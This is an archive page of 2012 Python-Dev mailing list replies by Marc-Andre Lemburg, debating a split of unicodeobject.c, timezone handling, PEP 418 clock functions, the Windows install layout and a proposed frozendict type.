http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-09-27: Released eGenix PyRun 1.1.0 ... http://egenix.com/go35 2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34 2012-10-29: PyCon DE 2012, Leipzig, Germany ... 4 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 25.10.2012 08:42, Nick Coghlan wrote: unicodeobject.c is too big, and should be restructured to make any natural modularity explicit, and provide an easier path for users that want to understand how the unicode implementation works. You can also achieve that goal by structuring the code in unicodeobject.c in a more modular way. It is already structured in sections, but there's always room for improvement, of course. As mentioned before, it is impossible to split out various sections into separate .c or .h files which then get included in the main unicodeobject.c. If that's where consensus is going, I'm with Stephen here in that such a separation should be done in higher level chunks, rather than creating 10 new files. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 25 2012) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-09-27: Released eGenix PyRun 1.1.0 ... http://egenix.com/go35 2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34 2012-10-29: PyCon DE 2012, Leipzig, Germany ... 4 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 25.10.2012 11:18, Maciej Fijalkowski wrote: On Thu, Oct 25, 2012 at 8:57 AM, M.-A. Lemburg m...@egenix.com wrote: On 25.10.2012 08:42, Nick Coghlan wrote: Why are any of these codecs here in unicodeobjectland in the first place? Sure, they're needed so that Python can find its own stuff, but in principle *any* codec could be needed. Is it just an heuristic that the codecs needed for 99% of the world are here, and other codecs live in separate modules? I believe it's a combination of history and whether or not they're needed by the interpreter during the bootstrapping process before the encodings namespace is importable. They are in unicodeobject.c so that the compilers can inline the code in the various other places where they are used in the Unicode implementation directly as necessary and because the codecs use a lot of functions from the Unicode API (obviously), so the other direction of inlining (Unicode API in codecs) is needed as well. I'm sorry to interrupt, but have you actually measured? What effect the lack of said inlining has on *any* benchmark is definitely beyond my ability to guess and I suspect is beyond the ability to guess of anyone else on this list. I challenge you to find a benchmark that is being significantly affected (15%) with the split proposed by Victor. It does not even have to be a real-world one, although that would definitely buy it more credibility. I think you misunderstood. What I described is the reason for having the base codecs in unicodeobject.c. I think we all agree that inlining has a positive effect on performance. The scale of the effect depends on the used compiler and platform. Victor already mentioned that he'll check the impact of his proposal, so let's wait for that. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 25 2012) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-09-27: Released eGenix PyRun 1.1.0 ... http://egenix.com/go35 2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34 2012-10-29: PyCon DE 2012, Leipzig, Germany ... 4 days to go ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Split unicodeobject.c into subfiles
On 23.10.2012 10:22, Benjamin Peterson wrote: 2012/10/22 Victor Stinner victor.stin...@gmail.com: Hi, I forked CPython repository to work on my split unicodeobject.c project: http://hg.python.org/sandbox/split-unicodeobject.c The result is 10 files (included the existing unicodeobject.c): 1176 Objects/unicodecharmap.c 1678 Objects/unicodecodecs.c 1362 Objects/unicodeformat.c 253 Objects/unicodeimpl.h 733 Objects/unicodelegacy.c 1836 Objects/unicodenew.c 2777 Objects/unicodeobject.c 2421 Objects/unicodeoperators.c 1235 Objects/unicodeoscodecs.c 1288 Objects/unicodeutfcodecs.c 14759 total This is just a proposition (and work in progress). Everything can be changed :-) unicodenew.c is not a good name. Content of this file may be moved somewhere else. Some files may be merged again if the separation is not justified. I don't like the unicode prefix for filenames, I would prefer a new directory. -- Shorter files are easier to review and maintain. The compilation is faster if only one file is modified. The MBCS codec requires windows.h. The whole unicodeobject.c includes it just for this codec. With the split, only unicodeoscodecs.c includes this file. The MBCS codec needs also a winver variable. This variable is defined between the BLOOM filter and the unicode_result_unchanged() function. How can you explain how these things are sorted? Where should I add a new function or variable? With the split, the variable is now defined very close to where is it used. You don't have to scroll 7000 lines to see where it is used. If you would like to work on a specific function, you don't have to use the search function of your editor to skip thousands to lines. For example, the 18 functions and 2 types related to the charmap codec are now grouped into one unique and short C file. It was already possible to extend and maintain unicodeobject.c (some people proved it!), but it should now be much simpler with shorter files. I would like to repeat my opposition to splitting unicodeobject.c. I don't think the benefits of such a split have been well justified, certainly not to the point that the claim about much simpler maintenance is true. Same feelings here. If you do go ahead with such a split, please only split the source files and keep the unicodeobject.c file which then includes all the other files. Such a restructuring should not result in compilers no longer being able to optimize code by inlining functions in one of the most important basic types we have in Python 3. Also note that splitting the file in multiple smaller ones will actually create more maintenance overhead, since patches will likely no longer be easy to merge from 3.3 to 3.4. BTW: The positive effect of having everything in one file is that you no longer have to figure which files to look when trying to find a piece of logic... it's just a ctrl-f or ctrl-s away :-) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 23 2012) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-09-27: Released eGenix PyRun 1.1.0 ... http://egenix.com/go35 2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34 2012-09-25: Released mxODBC 3.2.1 ... http://egenix.com/go33 2012-10-23: Python Meeting Duesseldorf ... today eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Split unicodeobject.c into subfiles?
Victor Stinner wrote: Hi, I would like to split the huge unicodeobject.c file into smaller files. It's just the longest C file of CPython: 14,849 lines. I don't know exactly how to split it, but first I would like to know if you would agree with the idea. Example: - Objects/unicode/codecs.c - Objects/unicode/mod_format.c - Objects/unicode/methods.c - Objects/unicode/operators.c - etc. I don't know if it's better to use a subdirectory, or use a prefix for new files: Objects/unicode_methods.c, Objects/unicode_codecs.c, etc. There is already a Python/codecs.c file for example (same filename). Better follow the already existing pattern of using unicode as prefix, e.g. unicodectype.c and unicodetype_db.h. I would like to split the unicodeobject.c because it's hard to navigate in this huge file between all functions, variables, types, macros, etc. It's hard to add new code and to fix bugs. For example, the implementation of str%args takes 1000 lines, 2 types and 10 functions (since my refactor yesterday, in Python 3.3 the main function is 500 lines long :-)). I only see one argument against such refactoring: it will be harder to backport/forwardport bugfixes. When making such a change, you have to pay close attention to functions that the compiler can potentially inline. AFAIK, moving such functions into a separate file would prevent such inlining/optimizations, e.g. the str formatter wouldn't be able to inline codec calls if placed in separate .c files. It may be better to split the file into multiple .h files which then get recombined into the one unicodeobject.c file. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Oct 05 2012) Python Projects, Consulting and Support ... http://www.egenix.com/ mxODBC.Zope/Plone.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-09-27: Released eGenix PyRun 1.1.0 ... http://egenix.com/go35 2012-09-26: Released mxODBC.Connect 2.0.1 ... http://egenix.com/go34 2012-09-25: Released mxODBC 3.2.1 ... http://egenix.com/go33 2012-10-23: Python Meeting Duesseldorf ... 18 days to go eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] TZ-aware local time
Just to add my 2 cents to this discussion as someone who's worked with mxDateTime for almost 15 years. I think we all agree that users of an application want to input date/time data using their local time (which may very well not be the timezone of the system running the application). On output they want to see their timezone as well, for obvious reasons. Now timezones are by nature not strictly defined, they change very often in history and what's worse: there's no way to predict the timezone details for the future. In many places around the world, the government defines the timezone data and they keep on changing the aspects every now and then, support day light savings time, drop the support, remove timezones for their countries, add new ones, or simply shift to a different time zone. The only timezone data that's more or less defined is historic timezone data, but even there, different sources can give different data. What does this mean for the application ? An application doesn't care about the timezone of a point in date/time. It just wants a standard way to store the date/time and a reliable way to work with it. The most commonly used standard for this is the UTC standard and so it's become good practice to convert all date/time values in applications to UTC for storage, math and manipulation. Just like with Unicode, the conversion to local time of the user happens at the UI level. Conversion from input data to UTC is easy, given the available C lib mechanisms (relying on the tz database). Conversion from UTC to local time is more difficult, but can also be done using the tz database. The timezone information of the entered data or the user's locale is usually available either through the environment, a configuration file or a database storing the original data - both on the input and on the output side. There's no need to stick this information onto the basic data types, since the application will already know anyway. For most use cases, this strategy works out really well. There are some cases, though, where you do need to work with local time instead of UTC. One such case is the definition of relative date/time values, another related one, the definition of repeating date/time values. These are often defined by users in terms of their local time or relative to other timezones they intend to travel to, so in order to convert the definitions back to UTC you have to run part of the calculation in the resp. local time zone. Repeating date/time values also tend to take other data into account such as bank holidays, opening times, etc. There's no end to making this more and more complicated :-) However, these things are not in the realm of a basic type anymore. They are application specific details. As a result, it's better to provide tools to implement all this, but not try force design decisions onto the application writer (which will eventually get in the way). BTW: That's main reason why I have so far refused to add native timezone support to the mxDateTime data types and instead let the applications decide on what's the best way for their particular use case. mxDateTime does provide extra tools for timezone support, but doesn't get in the way. It has so far worked out really well. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jun 06 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-07-17: Python Meeting Duesseldorf ... 41 days to go 2012-07-02: EuroPython 2012, Florence, Italy ... 26 days to go 2012-05-16: Released eGenix pyOpenSSL 0.13 ...http://egenix.com/go29 ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] [RFC] PEP 418: Add monotonic time, performance counter and process time functions
Victor Stinner wrote: Hi, Here is a simplified version of the first draft of the PEP 418. The full version can be read online. http://www.python.org/dev/peps/pep-0418/ The implementation of the PEP can be found in this issue: http://bugs.python.org/issue14428 I post a simplified version for readability and to focus on changes introduced by the PEP. Removed sections: Existing Functions, Deprecated Function, Glossary, Hardware clocks, Operating system time functions, System Standby, Links. Looks good. I'd suggest to also include a tool or API to determine the real resolution of a time function (as opposed to the advertised one). See pybench's clockres.py helper as example. You often find large differences between the advertised resolution and the available one, e.g. while process timers often advertise very good resolution, they are in fact often only updated at very coarse rates. E.g. compare the results of clockres.py on Linux: Clock resolution of various timer implementations: time.clock:1.000us time.time: 0.954us systimes.processtime:999.000us and FreeBSD: Clock resolution of various timer implementations: time.clock: 7812.500us time.time: 1.907us systimes.processtime: 1.000us and Mac OS X: Clock resolution of various timer implementations: time.clock:1.000us time.time: 0.954us systimes.processtime: 1.000us Regarding changing pybench: pybench has to stay backwards incompatible with earlier releases to make it possible to compare timings. You can add support for new timers to pybench, but please leave the existing timers and defaults in place. --- PEP: 418 Title: Add monotonic time, performance counter and process time functions Version: f2bb3f74298a Last-Modified: 2012-04-15 17:06:07 +0200 (Sun, 15 Apr 2012) Author: Cameron Simpson c...@zip.com.au, Jim Jewett jimjjew...@gmail.com, Victor Stinner victor.stin...@gmail.com Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 26-March-2012 Python-Version: 3.3 Abstract This PEP proposes to add ``time.get_clock_info(name)``, ``time.monotonic()``, ``time.perf_counter()`` and ``time.process_time()`` functions to Python 3.3. Rationale = If a program uses the system time to schedule events or to implement a timeout, it will not run events at the right moment or stop the timeout too early or too late when the system time is set manually or adjusted automatically by NTP. A monotonic clock should be used instead to not be affected by system time updates: ``time.monotonic()``. To measure the performance of a function, ``time.clock()`` can be used but it is very different on Windows and on Unix. On Windows, ``time.clock()`` includes time elapsed during sleep, whereas it does not on Unix. ``time.clock()`` precision is very good on Windows, but very bad on Unix. The new ``time.perf_counter()`` function should be used instead to always get the most precise performance counter with a portable behaviour (ex: include time spend during sleep). To measure CPU time, Python does not provide directly a portable function. ``time.clock()`` can be used on Unix, but it has a bad precision. ``resource.getrusage()`` can also be used on Unix, but it requires to get fields of a structure and compute the sum of time spent in kernel space and user space. The new ``time.process_time()`` function acts as a portable counter that always measures CPU time (doesn't include time elapsed during sleep) and has the best available precision. Each operating system implements clocks and performance counters differently, and it is useful to know exactly which function is used and some properties of the clock like its resolution and its precision. The new ``time.get_clock_info()`` function gives access to all available information of each Python time function. New functions: * ``time.monotonic()``: timeout and scheduling, not affected by system clock updates * ``time.perf_counter()``: benchmarking, most precise clock for short period * ``time.process_time()``: profiling, CPU time of the process Users of new functions: * time.monotonic(): concurrent.futures, multiprocessing, queue, subprocess, telnet and threading modules to implement timeout * time.perf_counter(): trace and timeit modules, pybench program * time.process_time(): profile module * time.get_clock_info(): pybench program to display information about the timer like the precision or the resolution The ``time.clock()`` function is deprecated because it is not portable: it behaves differently depending on the operating system. ``time.perf_counter()`` or ``time.process_time()`` should be used instead, depending on your requirements. ``time.clock()`` is marked as deprecated but is not planned for removal. Python functions New Functions -
Re: [Python-Dev] Use QueryPerformanceCounter() for time.monotonic() and/or time.highres()?
Victor Stinner wrote: You seem to have missed the episode where I explained that caching the last value in order to avoid going backwards doesn't work -- at least not if the cached value is internal to the API implementation. Yes, and I can't find it by briefly searching my mail. I haven't had the energy to follow every bit of this discussion because it has become completely insane. I'm trying to complete the PEP, but I didn't add this part yet. Of course we cannot promise not moving backwards, since there is a 64 bit wraparound some years in the future. Some years? I computed 584.5 years, so it should not occur in practice. 32-bit wraparound is a common issue which occurs in practice on Windows (49.7 days wraparound), and I propose a workaround in the PEP (already implemented in the related issue). Here's actual code from production: BOOL WINAPI QueryPerformanceCounterCCP( LARGE_INTEGER* li ) { static LARGE_INTEGER last = {0}; BOOL ok = QueryPerformanceCounter(li); if( !ok ) { return FALSE; } Did you already see it failing in practice? Python ignores the return value and only uses the counter value. Even negative delta values of time are usually harmless on the application level. A curiosity, but harmless. It depends on your usecase. For a scheduler or to implement a timeout, it does matter. For a benchmark, it's not an issue because you usually repeat a test at least 3 times. Most advanced benchmarked tools gives a confidence factor to check if the benchmark ran fine or not. I am offering empirical evidence here from hundreds of thousands of computers over six years: For timing and benchmarking, QPC is good enough, and will only be as precise as the hardware and operating system permits, which in practice is good enough. The PEP contains also different proofs that QPC is not steady, especially on virtual machines. I'm not sure I understand what you are after here, Victor. For benchmarks it really doesn't matter if one or two runs fail due to the timer having a problem: you just repeat the run and ignore the false results (you have such issues in all empirical studies). You're making things needlessly complicated here. Regarding the approach to try to cover all timing requirements into a single time.steady() API, I'm not convinced that this is good approach. Different applications have different needs, so it's better to provide interfaces to what the OS has to offer and let the application decide what's best. If an application wants to have a monotonic clock, it should use time.monotonic(). The OS doesn't provide it, you get an AttributeError and revert to some other function, depending on your needs. Having a time.steady() API make this decision for you, is not going to make your application more portable, since the choice will inevitably be wrong in some cases (e.g. going from CLOCK_MONOTONIC to time.time() as fallback). BTW: You might also want to take a look at the systimes.py module in pybench. We've been through discussions related to benchmark timing in 2006 already and that module summarizes the best practice outcome :-) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Apr 03 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-04-03: Python Meeting Duesseldorf today ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python install layout and the PATH on win32 (Rationale part 1: Regularizing the layout)
VanL wrote: As this has been brought up a couple times in this subthread, I figured that I would lay out the rationale here. There are two proposals on the table: 1) Regularize the install layout, and 2) move the python binary to the binaries directory. This email will deal with the first, and a second email will deal with the second. 1) Regularizing the install layout: One of Python's strengths is its cross-platform appeal. Carefully- written Python programs are frequently portable between operating systems and Python implementations with very few changes. Over the years, substantial effort has been put into maintaining platform parity and providing consistent interfaces to available functionality, even when different underlying implementations are necessary (such as with ntpath and posixpath). One place where Python is unnecessarily different, however, is in the layout and organization of the Python environment. This is most visible in the name of the directory for binaries on the Windows platform (Scripts) versus the name of the directory for binaries on every other platform (bin), but a full listing of the layouts shows substantial differences in layout and capitalization across platforms. Sometimes the include is capitalized (Include), and sometimes not; and the python version may or may not be included in the path to the standard library or not. This may seem like a harmless inconsistency, and if that were all it was, I wouldn't care. (That said, cross-platform consistency is its own good). But it becomes a real pain when combined with tools like virtualenv or the new pyvenv to create cross-platform development environments. In particular, I regularly do development on both Windows and a Mac, and then deploy on Linux. I do this in virtualenvs, so that I have a controlled and regular environment. I keep them in sync using source control. The problem comes when I have executable scripts that I want to include in my dvcs - I can't have it in the obvious place - the binaries directory - because *the name of the directory changes when you move between platforms.* More concretely, I can't hg add Scripts/runner.py? on my windows environment (where it is put in the PATH by virtualenv) and thendo a pull on Mac or Linux and have it end up properly in bin/runner.py which is the correct PATH for those platforms. This applies anytime there are executable scripts that you want to manage using source control across platforms. Django projects regularly have these, and I suspect we will be seeing more of this with the new project support in virtualenvwrapper. While a few people have wondered why I would want this -- hopefully answered above -- I have not heard any opposition to this part of the proposal. This first proposal is just to make the names of the directories match across platforms. There are six keys defined in the installer files (sysconfig.cfg and distutils.command.install): 'stdlib', 'purelib', 'platlib', 'headers', 'scripts', and 'data'. Currently on Windows, there are two different layouts defined: 'nt': { 'stdlib': '{base}/Lib', 'platstdlib': '{base}/Lib', 'purelib': '{base}/Lib/site-packages', 'platlib': '{base}/Lib/site-packages', 'include': '{base}/Include', 'platinclude': '{base}/Include', 'scripts': '{base}/Scripts', 'data' : '{base}', }, 'nt_user': { 'stdlib': '{userbase}/Python{py_version_nodot}', 'platstdlib': '{userbase}/Python{py_version_nodot}', 'purelib': '{userbase}/Python{py_version_nodot}/site-packages', 'platlib': '{userbase}/Python{py_version_nodot}/site-packages', 'include': '{userbase}/Python{py_version_nodot}/Include', 'scripts': '{userbase}/Scripts', 'data' : '{userbase}', }, The proposal is to make all the layouts change to: 'nt': { 'stdlib': '{base}/lib', 'platstdlib': '{base}/lib', 'purelib': '{base}/lib/site-packages', 'platlib': '{base}/lib/site-packages', 'include': '{base}/include', 'platinclude': '{base}/include', 'scripts': '{base}/bin', 'data' : '{base}', }, The change here is that 'Scripts' will change to 'bin' and the capitalization will be removed. Also, user installs of Python will have the same internal layout as system installs of Python. This will also, not coincidentally, match the install layout for posix, at least with regard to the 'bin', 'lib', and 'include' directories. Again, I have not heard *anyone* objecting to this part of the proposal as it is laid out here. (Paul had a concern with the lib directory earlier, but he said he was ok with the above). Please let me know if you have any problems or concerns with this part 1. Since userbase will usually be a single directory in the home dir of a user, the above would loose the possibility to support multiple Python versions
Re: [Python-Dev] Python install layout and the PATH on win32
Lindberg, Van wrote: Mark, MAL, Martin, Tarek, Could you comment on this? This is in the context of changing the name of the 'Scripts' directory on windows to 'bin'. Éric brings up the point (explained more below) that if we make this change, packages made/installed the new packaging infrastructure and those made/installed with bdist_winist and the old (frozen) distutils will be inconsistent. The reason why is that the old distutils has a hard-coded dict in distutils.command.install that would point to the old locations. If we were to make this change in sysconfig.cfg, we would probably want to make a corresponding change in the INSTALL_SCHEMES dict in distutils.command.install. I'm not sure I understand the point in making that change. Could you expand on the advantage of using bin instead of Scripts ? Note that distutils just provides defaults for these installation locations. All of them can be overridden using command line arguments to the install command. FWIW: I've dropped support for bdist_wininst in mxSetup.py since bdist_msi provides much better system integration. More context: On 3/20/2012 10:41 PM, Éric Araujo wrote: Le 20/03/2012 21:40, VanL a écrit : On Tuesday, March 20, 2012 at 5:07 PM, Paul Moore wrote: It's worth remembering Éric's point - distutils is frozen and changes are in theory not allowed. This part of the proposal is not possible without an exception to that ruling. Personally, I don't see how making this change could be a problem, but I'm definitely not an expert. If distutils doesn't change, bdist_wininst installers built using distutils rather than packaging will do the wrong thing with regard to this change. End users won't be able to tell how an installer has been built. Looking at the code in bdist_wininst, it loops over the keys in the INSTALL_SCHEMES dict to find the correct locations. If the hard-coded dict were changed, then the installer would 'just work' with the right location - and this matches my experience having made this sort of change. When I change the INSTALL_SCHEMES dict, things get installed according to the new scheme without difficulty using the standard tools. The only time when something is trouble is if it does its own install routine and hard-codes 'Scripts' as the name of the install directory - and I have only seen that in PyPM a couple versions ago. From the top of my head the developers with the most experience about Windows deployment are Martin v. Löwis, Mark Hammond and Marc-André Lemburg (not sure about the Windows part for MAL, but he maintains a library that extends distutils and has been broken in the past). I think their approval is required for this kind of huge change. Note the above - this is why I would like your comment. The point of the distutils freeze (i.e. feature moratorium) is that we just can’t know what complicated things people are doing with undocumented internals, because distutils appeared unmaintained and under-documented for years and people had to work with and around it; since the start of the distutils2 project we can Just Say No™ to improvements and features in distutils. “I don’t see what could possibly go wrong” is a classic line in both horror movies and distutils developmentwink. Renaming Scripts to bin on Windows would have effects on some tools we know and surely on many tools we don’t know. We don’t want to see again people who use or extend distutils come with torches and pitchforks because internals were changed and we have to revert. So in my opinion, to decide to go ahead with the change we need strong +1s from the developers I named above and an endorsement by Tarek, or if he can’t participate in the discussion, Guido. As a footnote, distutils is already broken in 3.3. Now we give users or system administrators the possibility to edit the install schemes at will in sysconfig.cfg, but distutils hard-codes the old scheme. I tend to think it should be fixed, to make the distutils-packaging transition/cohabitation possible. Any comment? Thanks, Van CIRCULAR 230 NOTICE: To ensure compliance with requirements imposed by U.S. Treasury Regulations, Haynes and Boone, LLP informs you that any U.S. tax advice contained in this communication (including any attachments) was not intended or written to be used, and cannot be used, for the purpose of (i) avoiding penalties under the Internal Revenue Code or (ii) promoting, marketing or recommending to another party any transaction or matter addressed herein. CONFIDENTIALITY NOTICE: This electronic mail transmission is confidential, may be privileged and should be read or retained only by the intended recipient. If you have received this transmission in error, please immediately notify the sender and delete it from your system. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Mar
Re: [Python-Dev] Add a frozendict builtin type
Victor Stinner wrote: See also the PEP 351. I read the PEP and the email explaining why it was rejected. Just to be clear: the PEP 351 tries to freeze an object, try to convert a mutable or immutable object to an immutable object. Whereas my frozendict proposition doesn't convert anything: it just raises a TypeError if you use a mutable key or value. For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError. I fail to see the use case you're trying to address with this kind of frozendict(). The purpose of frozenset() is to be able to use a set as dictionary key (and to some extent allow for optimizations and safe iteration). Your implementation can be used as dictionary key as well, but why would you want to do that in the first place ? If you're thinking about disallowing changes to the dictionary structure, e.g. in order to safely iterate over its keys or items, freezing the keys is enough. Requiring the value objects not to change is too much of a restriction to make the type useful in practice, IMHO. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 28 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-02-13: Released eGenix pyOpenSSL 0.13http://egenix.com/go26 2012-02-09: Released mxODBC.Zope.DA 2.0.2 http://egenix.com/go25 2012-02-06: Released eGenix mx Base 3.2.3 http://egenix.com/go24 ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Add a frozendict builtin type
Steven D'Aprano wrote: M.-A. Lemburg wrote: Victor Stinner wrote: See also the PEP 351. I read the PEP and the email explaining why it was rejected. Just to be clear: the PEP 351 tries to freeze an object, try to convert a mutable or immutable object to an immutable object. Whereas my frozendict proposition doesn't convert anything: it just raises a TypeError if you use a mutable key or value. For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError. I fail to see the use case you're trying to address with this kind of frozendict(). The purpose of frozenset() is to be able to use a set as dictionary key (and to some extent allow for optimizations and safe iteration). Your implementation can be used as dictionary key as well, but why would you want to do that in the first place ? Because you have a mapping, and want to use a dict for speedy, convenient lookups. Sometimes your mapping involves the key being a string, or an int, or a tuple, or a set, and Python makes it easy to use that in a dict. Sometimes the key is itself a mapping, and Python makes it very difficult. Just google on python frozendict or python immutabledict and you will find that this keeps coming up time and time again, e.g.: http://www.cs.toronto.edu/~tijmen/programming/immutableDictionaries.html http://code.activestate.com/recipes/498072-implementing-an-immutable-dictionary/ http://code.activestate.com/recipes/414283-frozen-dictionaries/ http://bob.pythonmac.org/archives/2005/03/04/frozendict/ http://python.6.n6.nabble.com/frozendict-td4377791.html http://www.velocityreviews.com/forums/t648910-does-python3-offer-a-frozendict.html http://stackoverflow.com/questions/2703599/what-would-be-a-frozen-dict Only the first of those links appears to actually discuss reasons for adding a frozendict, but it fails to provide real world use cases and only gives theoretical reasons for why this would be nice to have. From a practical view, a frozendict would allow thread-safe iteration over a dict and enable more optimizations (e.g. using an optimized lookup function, optimized hash parameters, etc.) to make lookup in static tables more efficient. OTOH, using a frozendict as key in some other dictionary is, well, not a very realistic use case - programmers should think twice before using such a design :-) If you're thinking about disallowing changes to the dictionary structure, e.g. in order to safely iterate over its keys or items, freezing the keys is enough. Requiring the value objects not to change is too much of a restriction to make the type useful in practice, IMHO. It's no more of a limitation than the limitation that strings can't change. Frozendicts must freeze the value as well as the key. Consider the toy example, mapping food combinations to calories: d = { {appetizer = fried fish, main = double burger, drink = cola}: 5000, {appetizer = None, main = green salad, drink = tea}: 200, } (syntax is only for illustration purposes) Clearly the hash has to take the keys and values into account, which means that both the keys and values have to be frozen. (Values may be mutable objects, but then the frozendict can't be hashed -- just like tuples can't be hashed if any item in them is mutable.) Right, but that doesn't mean you have to require that values are hashable. A frozendict could (and probably should) use the same logic as tuples: if the values are hashable, the frozendict is hashable, otherwise not. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 28 2012) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ 2012-02-13: Released eGenix pyOpenSSL 0.13http://egenix.com/go26 2012-02-09: Released mxODBC.Zope.DA 2.0.2 http://egenix.com/go25 2012-02-06: Released eGenix mx Base 3.2.3 http://egenix.com/go24 ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] accept string in a2b and base64?
